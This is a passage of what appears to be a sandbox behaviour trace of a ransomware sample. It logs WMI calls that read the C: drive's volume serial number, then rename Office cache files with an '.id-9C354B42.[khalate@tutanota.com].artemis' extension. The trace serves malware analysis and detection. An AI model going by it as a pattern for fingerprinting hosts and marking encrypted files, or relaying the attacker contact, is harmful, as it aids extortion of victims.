This=0x6738460, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0205.561] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0205.562] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.562] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0205.562] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0205.562] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0205.562] IUnknown:Release (This=0x72015c) returned 0x1 [0205.562] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6736e58) returned 0x0 [0205.562] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0205.562] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x6738b60) returned 0x0 [0205.563] WbemDefPath:IUnknown:Release (This=0x6736e58) returned 0x0 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x6738b60) returned 0x0 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0205.563] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x9821078) returned 0x0 [0205.563] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9821078, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.563] WbemDefPath:IUnknown:Release (This=0x9821078) returned 0x3 [0205.563] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0205.563] CoGetContextToken (in: pToken=0x69ddda0 | out: pToken=0x69ddda0) returned 0x0 [0205.563] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0205.563] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0205.563] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0205.563] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0205.563] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0205.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x6738b60) returned 0x0 [0205.563] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0205.563] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0205.563] WbemDefPath:IWbemPath:SetText (This=0x6738b60, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0205.564] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0205.564] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0205.564] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.564] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0205.564] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0205.564] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0205.564] IUnknown:Release (This=0x72015c) returned 0x1 [0205.564] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x672f190) returned 0x0 [0205.564] WbemLocator:IUnknown:QueryInterface (in: This=0x672f190, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0205.564] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f190, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x6736f28) returned 0x0 [0205.565] WbemLocator:IUnknown:Release (This=0x672f190) returned 0x0 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x6736f28) returned 0x0 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0205.565] WbemLocator:IUnknown:AddRef (This=0x6736f28) returned 0x3 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0205.565] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0205.565] CoGetContextToken (in: pToken=0x69de080 | out: pToken=0x69de080) returned 0x0 [0205.565] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: ppvObject=0x69de568*=0x0) returned 0x80004002 [0205.565] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x2 [0205.565] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x1 [0205.565] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0205.565] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0205.565] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x6736f28) returned 0x0 [0205.565] WbemLocator:IUnknown:AddRef (This=0x6736f28) returned 0x3 [0205.565] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x2 [0205.565] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0205.565] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0205.565] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.565] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6737028) returned 0x0 [0205.566] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737028, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x6748054) returned 0x0 [0209.868] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x780be4) returned 0x0 [0209.868] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x6748054, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0209.868] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0209.868] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x780c04) returned 0x0 [0209.868] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x780be4) returned 0x0 [0209.868] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x6748054, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.868] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0209.868] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0209.868] CoTaskMemFree (pv=0x77e0b8) [0209.869] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0209.869] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x780c04) returned 0x0 [0209.869] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0209.871] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0209.872] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0209.872] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0209.873] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0209.874] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x780b64) returned 0x0 [0209.874] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.874] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0209.874] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0209.874] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0209.874] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x780bec) returned 0x0 [0209.874] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0209.874] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0209.874] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0209.874] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0209.874] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0209.874] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x6748054) returned 0x0 [0209.874] WbemLocator:IUnknown:AddRef (This=0x6748054) returned 0x4 [0209.874] WbemLocator:IUnknown:Release (This=0x6748054) returned 0x3 [0209.874] WbemLocator:IUnknown:Release (This=0x6748054) returned 0x2 [0209.874] SysStringLen (param_1=0x0) returned 0x0 [0209.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0209.875] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0209.875] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.875] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0209.875] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0209.875] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x780c04) returned 0x0 [0209.875] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0209.875] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0209.875] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0209.875] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.875] IWbemServices:GetObject (in: This=0x6748054, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0 | out: ppObject=0x69ded94*=0x673bdf8, ppCallResult=0x0) returned 0x0 [0210.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x69ded94 | out: puCount=0x69ded94*=0x2) returned 0x0 [0210.208] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x69ded90*=0x0, pszText=0x0 | out: puBuffLength=0x69ded90*=0xf, pszText=0x0) returned 0x0 [0210.208] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x69ded90*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.208] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350ad34*=0, plFlavor=0x350ad38*=0 | out: pVal=0x69ded90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350ad34*=8, plFlavor=0x350ad38*=0) returned 0x0 [0210.208] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.208] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.208] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350ad34*=8, plFlavor=0x350ad38*=0 | out: pVal=0x69ded98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350ad34*=8, plFlavor=0x350ad38*=0) returned 0x0 [0210.208] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.208] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.208] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0210.208] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x7b [0210.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedf8) returned 1 [0210.208] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x69dee74 | out: lpFileInformation=0x69dee74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x220a6980, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x263620)) returned 1 [0210.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedf4) returned 1 [0210.209] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0210.210] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0210.210] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, 